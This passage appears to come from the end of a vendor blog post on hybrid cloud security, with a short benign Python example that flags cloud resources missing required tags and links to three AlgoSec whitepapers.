In today's fast-paced business environment, hybrid cloud computing can benefit your organization in many ways. But to capture these benefits, you should make an effort to boost hybrid cloud security. Incorporate the best practices discussed here to improve security and take full advantage of your hybrid environment. To learn more about hybrid cloud security, listen to our Lessons in Cybersecurity podcast episode or head to our hybrid cloud resource hub.
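The tagging practice described above is easy to enforce programmatically: scan an inventory of resources and flag any that lack the required tag keys. This is a minimal sketch; the required tag keys and the sample inventory are hypothetical, not tied to any specific cloud provider's API:

```python
# Sketch: flag cloud resources missing required tags.
# Tag keys and the sample inventory below are hypothetical examples.
REQUIRED_TAGS = {"os", "business_unit", "region"}

def missing_tags(resource_tags: dict) -> set:
    """Return the set of required tag keys absent from a resource's tags."""
    return REQUIRED_TAGS - resource_tags.keys()

inventory = {
    "vm-frontend": {"os": "linux", "business_unit": "sales", "region": "eu-west"},
    "db-orders": {"os": "linux", "business_unit": "sales"},  # no region tag
}

for name, tags in inventory.items():
    gaps = missing_tags(tags)
    if gaps:
        print(f"{name} is missing required tags: {sorted(gaps)}")
```

A check like this can run on a schedule or in a deployment pipeline, so untagged resources are caught before they erode the ownership and visibility benefits that tagging provides.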
- Challenges in Managing Security in Native, Hybrid and Multi-Cloud Environments - AlgoSec
Challenges in Managing Security in Native, Hybrid and Multi-Cloud Environments Download PDF
- 6 must-dos to secure the hybrid cloud - AlgoSec
6 must-dos to secure the hybrid cloud Download PDF
- Optimizing security and efficiency in the cloud - AlgoSec
Optimizing security and efficiency in the cloud Download PDF





